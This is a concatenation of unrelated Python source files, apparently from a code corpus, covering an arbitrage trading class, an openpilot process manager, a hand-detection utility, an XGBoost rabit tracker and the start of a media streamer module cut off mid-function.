:param kwargs:
:return:
"""
logger.debug(kwargs)
return self.client.place_order(**kwargs)
def log_executions(self, buy_order, sell_order, buy_exchange, sell_exchange):
"""This function logs the two legs of an arbitrage trade collection"""
logger.debug("logging order")
combo_id = uuid.uuid4()
timestamp = util.unix_milli()
# Buy leg
extract_and_log("buy", combo_id, timestamp, buy_exchange, buy_order, self.name())
extract_and_log("sell", combo_id, timestamp, sell_exchange, sell_order, self.name())
#########################################################
# Settings
#########################################################
def load_configs_yaml(self) -> Dict[str, Union[float, str, Dict]]:
configs: Dict
with open(self.configs_file, 'r') as stream:
try:
configs = yaml.safe_load(stream)
except yaml.YAMLError as exc:
logger.error(exc)
return configs
def set_threshold_map(self, thresh):
threshold_map = {}
for exchange in self.exchanges:
if exchange not in threshold_map.keys():
threshold_map[exchange] = {}
for second_exchange in self.exchanges:
if exchange == second_exchange:
continue
threshold_map[exchange][second_exchange] = thresh
self.threshold_map = threshold_map
def set_fee_map(self, fees: Dict[str, float]):
for exchange, fee in fees.items():
self.fee_map[exchange] = fee
if __name__ == '__main__':
logger_wrapper = src.buildblocks.init_logger(mode=src.helpers.DBMode.DEV)
test_algo_name = "A-tests-multi-lateral"
client_sdk = src.buildblocks.init_sdk_client(logger_wrapper, sdk_client=src.helpers.SDKClient.REAL)
instance = ArbitrageInstance(
algo_name=test_algo_name,
logger_wrapper=logger_wrapper,
client=client_sdk
)
while True:
instance.trade_algorithm()
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC, TICI
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad, pm_grant, system
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1225
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry and (not dirty):
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from cereal import log
from common.params import Params
from selfdrive.registration import register
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
#"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
#"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
#"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
#"tombstoned": "selfdrive.tombstoned",
#"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
if TICI:
managed_processes["timezoned"] = "selfdrive.timezoned"
persistent_processes += ['timezoned']
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
'logcatd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
os.umask(0) # Make sure we can create files with 777 permissions
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, device=HARDWARE.get_device_type())
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
shutdownd = Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",))
shutdownd.start()
pm_grant("com.neokii.openpilot", "android.permission.ACCESS_FINE_LOCATION")
system("am startservice com.neokii.oproadlimit/.MainService")
system("am startservice com.neokii.openpilot/.MainService")
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
# subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON and "QT" not in os.environ:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
device_state_sock = messaging.sub_sock('deviceState')
pm = messaging.PubMaster(['managerState'])
while 1:
msg = messaging.recv_sock(device_state_sock, wait=True)
if msg.deviceState.freeSpacePercent < 5:
logger_dead = True
if msg.deviceState.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.deviceState.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# send managerState
states = []
for p in managed_processes:
state = log.ManagerState.ProcessState.new_message()
state.name = p
if p in running:
state.running = running[p].is_alive()
state.pid = running[p].pid
state.exitCode = running[p].exitcode or 0
states.append(state)
msg = messaging.new_message('managerState')
msg.managerState.processes = states
pm.send('managerState', msg)
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
# HKG
("LongControlEnabled", "0"),
("MadModeEnabled", "1"),
("AutoLaneChangeEnabled", "0"),
# scc smoother
("SccSmootherState", "0"),
("SccSmootherEnabled", "0"),
("SccSmootherSlowOnCurves", "0"),
("SccSmootherSyncGasPressed", "0"),
("SccSmootherSwitchGapOnly", "0"),
("ShowDebugUI", "0")
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
test.py
|
import multiprocessing as mp
import os
import mod
print(os.getpid())
ps = [mp.Process(target=mod.f) for _ in range(3)]
for p in ps:
p.start()
for p in ps:
p.join()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
import json
detection_graph = tf.Graph()
sys.path.append("..")
# Load a frozen infrerence graph into memory
def load_inference_graph(NUM_CLASSES, PATH_TO_CKPT, PATH_TO_LABELS):
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# load frozen tensorflow model into memory
print("> ====== loading frozen graph into memory", PATH_TO_CKPT)
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.", PATH_TO_CKPT, PATH_TO_LABELS)
return detection_graph, sess, category_index
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def get_tags(classes, category_index, num_hands_detect, score_thresh, scores, boxes, image_np):
im_height, im_width, channels = image_np.shape
tags = []
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
if classes[i] in category_index.keys():
class_name = category_index[classes[i]]['name']
else:
class_name = 'N/A'
tag = {}
tag['class'] = class_name
tag['score'] = scores[i].tolist()
tag['box'] = boxes[i].tolist()
tag["box_center"] = ( int((left + (right - left)/2 )) , int((top + (bottom - top)/2 )) )
tags.append(tag)
return tags
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores), np.squeeze(classes).astype(np.int32)
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, image_np):
im_height, im_width, channels = image_np.shape
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
def draw_box_on_image_id(tags, image_np):
for tag in tags:
cv2.putText(image_np, str(tag["id_label"]) , tag["box_center"],
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
cv2.putText(image_np, " " + str(tag["class"]), tag["box_center"],
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255, 0, 9), 2)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
tracker.py
|
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script is a variant of dmlc-core/dmlc_tracker/tracker.py,
which is a specialized version for xgboost tasks.
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements, too-many-instance-attributes
import socket
import struct
import time
import logging
from threading import Thread
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return b''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s.encode())
def recvstr(self):
slen = self.recvint()
return self.recvall(slen).decode()
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
magic = slave.recvint()
assert magic == kMagic, f'invalid magic number={magic} from {self.host}'
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev not in (-1, rank):
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext not in (-1, rank):
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for _ in range(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connection was successuly setup
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=9091, port_end=9999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for _port in range(port, port_end):
try:
sock.bind((hostIP, _port))
self.port = _port
break
except socket.error as e:
if e.errno in [98, 48]:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def slave_envs(self):
"""
get enviroment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) // 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if not cset:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map, this is a bit hacky, call for better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0: 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
# set of nodes that finishs the job
shutdown = {}
# set of nodes that is waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that is pending to be assigned rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that is pending for getting up
todo_nodes = list(range(nslave))
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert todo_nodes
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Recieve %s signal from %s; assign rank %d',
s.cmd, s.host, s.rank)
if not todo_nodes:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
while self.thread.isAlive():
self.thread.join(100)
def alive(self):
return self.thread.isAlive()
|
streamer.py
|
"""
Streamer for reading input
"""
# Copyright (C) 2021-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
import abc
import multiprocessing
import queue
import sys
from enum import Enum
from pathlib import Path
from typing import Iterable, Iterator, List, NamedTuple, Optional, Tuple, Union
import cv2
import numpy as np
from natsort import natsorted
class MediaType(Enum):
"""
This Enum represents the types of input
"""
IMAGE = 1
VIDEO = 2
CAMERA = 3
class MediaExtensions(NamedTuple):
"""
This NamedTuple represents the extensions for input
"""
IMAGE: Tuple[str, ...]
VIDEO: Tuple[str, ...]
MEDIA_EXTENSIONS = MediaExtensions(
IMAGE=(".jpg", ".jpeg", ".png", ".ppm", ".bmp", ".pgm", ".tif", ".tiff", ".webp"),
VIDEO=(".avi", ".mp4"),
)
def get_media_type(path: Optional[Union[str, Path]]) -> MediaType:
"""
Get Media Type from the input path.
:param path: Path to file or directory.
Could be None, which implies camera media type.
"""
if isinstance(path, str):
